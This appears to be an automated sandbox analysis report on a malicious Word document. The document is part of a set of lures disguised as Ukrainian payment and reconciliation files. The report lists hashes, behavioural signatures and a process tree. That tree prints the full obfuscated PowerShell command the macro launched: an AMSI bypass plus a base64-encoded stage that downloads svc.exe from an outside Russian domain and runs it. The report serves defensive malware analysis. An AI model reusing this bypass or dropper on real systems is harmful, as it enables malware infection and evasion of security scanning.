Overview
overview
10Static
static
854678013c8...e6.pdf
windows7-x64
354678013c8...e6.pdf
windows10-2004-x64
3Плате...ь.url
windows7-x64
1Плате...ь.url
windows10-2004-x64
1Плате...df.wsf
windows7-x64
10Плате...df.wsf
windows10-2004-x64
10Сопро...df.wsf
windows7-x64
10Сопро...df.wsf
windows10-2004-x64
10Акт_з�...19.scr
windows7-x64
10Акт_з�...19.scr
windows10-2004-x64
10a059d671d9...a2.exe
windows7-x64
10a059d671d9...a2.exe
windows10-2004-x64
10Плате...df.wsf
windows7-x64
10Плате...df.wsf
windows10-2004-x64
10Сопро...df.wsf
windows7-x64
10Сопро...df.wsf
windows10-2004-x64
10cd123c288f...f8c.js
windows7-x64
6cd123c288f...f8c.js
windows10-2004-x64
7d6d722ae73...21.doc
windows7-x64
10d6d722ae73...21.doc
windows10-2004-x64
10fdfbdd4294...44.exe
windows7-x64
10fdfbdd4294...44.exe
windows10-2004-x64
10Analysis
-
max time kernel
139s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2025 05:14
Behavioral task
behavioral1
Sample
54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6.pdf
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Платежное Поручение в iнозеной валюте та сопроводiтель.url
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Платежное Поручение в iнозеной валюте та сопроводiтель.url
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Платежное Поручение в iнозеной валюте.pdf.wsf
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Платежное Поручение в iнозеной валюте.pdf.wsf
Resource
win10v2004-20250129-en
Behavioral task
behavioral7
Sample
Сопроводiтельни документи вiд 23.09.2024p.pdf.wsf
Resource
win7-20241023-en
Behavioral task
behavioral8
Sample
Сопроводiтельни документи вiд 23.09.2024p.pdf.wsf
Resource
win10v2004-20250129-en
Behavioral task
behavioral9
Sample
Акт_звiрки_№180924_вiд_26_09_2024р_зг_рах_UA973248410000000026006263319.scr
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Акт_звiрки_№180924_вiд_26_09_2024р_зг_рах_UA973248410000000026006263319.scr
Resource
win10v2004-20250129-en
Behavioral task
behavioral11
Sample
a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral13
Sample
Платежное Поручение в iнозеной валюте.pdf.wsf
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
Платежное Поручение в iнозеной валюте.pdf.wsf
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Сопроводiтельни документи вiд 23.09.2024p.pdf.wsf
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
Сопроводiтельни документи вiд 23.09.2024p.pdf.wsf
Resource
win10v2004-20250129-en
Behavioral task
behavioral17
Sample
cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js
Resource
win10v2004-20250129-en
Behavioral task
behavioral19
Sample
d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144.exe
Resource
win10v2004-20250129-en
General
-
Target
d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc
-
Size
119KB
-
MD5
7564fc9db09034f49408c33fae34a335
-
SHA1
c0a49e5e0054673b3cea2a9e279c896eb2ebec27
-
SHA256
d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21
-
SHA512
7e0cc0628d8d6c00c713fa9318d0ec0735f19d449bcf86e6c93e837bd55364d2029b4d309538fc8be5d1b5035499572d2f5e3480593576171b9e6ca059e3b94a
-
SSDEEP
1536:J7LlLq2TvoxHCQQv56sSFXC5uHQA1pzJGrDwQwMw1UV6XhnOQ5w:dLzTKiQa2SgPpzErF41k6ksw
Malware Config
Extracted
http://goodmastersportunicum.ru/load/svc.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1912 2324 Powershell.exe 81 -
pid Process 1912 Powershell.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2324 WINWORD.EXE 2324 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1912 Powershell.exe 1912 Powershell.exe 4524 powershell.exe 4524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1912 Powershell.exe Token: SeDebugPrivilege 4524 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2324 WINWORD.EXE 2324 WINWORD.EXE 2324 WINWORD.EXE 2324 WINWORD.EXE 2324 WINWORD.EXE 2324 WINWORD.EXE 2324 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2324 wrote to memory of 1912 2324 WINWORD.EXE 84 PID 2324 wrote to memory of 1912 2324 WINWORD.EXE 84 PID 1912 wrote to memory of 4524 1912 Powershell.exe 88 PID 1912 wrote to memory of 4524 1912 Powershell.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFiowjhOHWOHEOUF = $null; sleep 3; $text = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W1JlZl0uQXNzZW1ibHkuR2V0VHlwZSgkQ2VvaXV3am9ldXlmdykuR2V0RmllbGQoJEZFSWZ3dWlvZWhmYWl3eVlPRVRXVFJ1d3llICsgJEVGODAzNHVvd2lleXBvd2l1ZSwiTm9uUCIgKyAidWIiICsgImxpYyxTdCIgKyAiYXRpYyIpLlNldFZhbHVlKCRERmlvd2poT0hXT0hFT1VGLCR0cnVlKQ==')); iex $text; $BBB = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFVVVSA9ICdodHRwOi8vZ29vZG1hc3RlcnNwb3J0dW5pY3VtLnJ1L2xvYWQvc3ZjLmV4ZSc7ICRQUFAgPSAnQzpcVXNlcnNcUHVibGljXExpYnJhcmllc1xzdmMuZXhlJzsgJFdXVyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRXV1cuRG93bmxvYWRGaWxlKCRVVVUsICRQUFApOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkUFBQOw==')); $CCC = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($BBB)); powershell -E $CCC;2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABVAFUAVQAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AZwBvAG8AZABtAGEAcwB0AGUAcgBzAHAAbwByAHQAdQBuAGkAYwB1AG0ALgByAHUALwBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnADsAIAAkAFAAUABQACAAPQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAHMAdgBjAC4AZQB4AGUAJwA7ACAAJABXAFcAVwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFcAVwBXAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAVQBVACwAIAAkAFAAUABQACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAUABQAFAAOwA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
240B
MD5bd8143815063f324d262df4a2bd97a6b
SHA14b2d35dd332310c967fa05963a0342a8208b8cb3
SHA2563e7940349792d64fb52b32a0dc0cee55177330589fc07d2fb19cfabf23a6bd2b
SHA51231d0829b4ad28340b8a42ccd6ab5ad8c7ea6ac72a5f4ec5457e1d95479b53b62fb4e0722ced62705b9b06b7c2e56f7a54a968ca633f49b9c0bdb1937f8203bb6
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f